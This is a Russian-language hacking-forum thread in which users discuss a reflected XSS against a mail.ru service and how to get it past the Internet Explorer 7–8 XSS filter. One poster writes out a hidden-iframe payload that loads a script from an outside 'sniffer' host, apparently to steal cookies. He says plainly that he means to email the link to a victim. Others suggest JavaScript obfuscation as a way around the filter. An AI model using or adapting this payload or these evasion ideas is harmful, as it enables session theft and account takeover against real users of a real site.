Сообщение от
svesve
зря пассивку спалил
пофиксят
пассивку свою я выкладывать не стал, а взял наугад из темы пассивные ксс, дабы палева меньше было. так что это палевная пассивка, приведенная чисто для примера.
Сообщение от
dober.man
satana-fu, то что у вас на скрине - информационная панель. То что блокирует - xss-фильтр, присущий ie7-8.
Что вы пытаетесь кодировать?! XSS-фильтр можно отключиться в настройках, во вкладке безопасность. А обходится он при помощи js-обфускации, но с пассивными xss этот номер не пройдет.
Так что, если хотите увидеть результат в вашем конкретном примере - просто отключите фильтр.
upd:
p.s. а вообще, если бы вы кликнули мышью по этой выпавшей информационной панели - поняли бы все сами, т.к. там все прекрасно написанно!
А если совсем худо -
то вот
доберман, я прекрасно знаю, что у меня на скрине, а скрин сделал чтоб было общее понятие как блокируется.
кажется или я вопрос неправильно поставил или мне загодя неправильно отвечают.
смотри, я пытаюсь кодировать фрейм с пассивкой,
PHP код:
<iframe width=1 height=1 style="position: absolute; visibility: hidden;" src="http://11x11.mail.ru/?&url='"><script src=http://sniffer.ru/js.js></script>"></iframe>
закодировать его в яваскрипт, и дальше уже запускать в теле страницы скриптом
<script src=закодированный.js></script> ан не пробивает, все равно распознается XSS
совет про отключение фильтра ваще не к месту))), иначе при отправке жертве письма с ксс, мне надо отправлять следующий текст "
если у вас ИЕ 7-8, то отключите, пожалуйста, фильтр безопасности перед тем как перейдете по следующей ссылке." ?
p.s. а вообще, если бы вы кликнули мышью по этой выпавшей информационной панели - поняли бы все сами, т.к. там все прекрасно написанно!
мне надо было заскринить весь инструктаж по ксс, который выводится при клике мышкой?
весь вопрос заключается в том, как в ИЕ 8 запустить пассивную ксс при включенном фильтре, как заставить ссылку обработаться в ИЕ 8, а не в том, что такое ксс и с чем его кушать.
ps. за ссылку спасибо, пошел читать, может найду что нибудь полезное.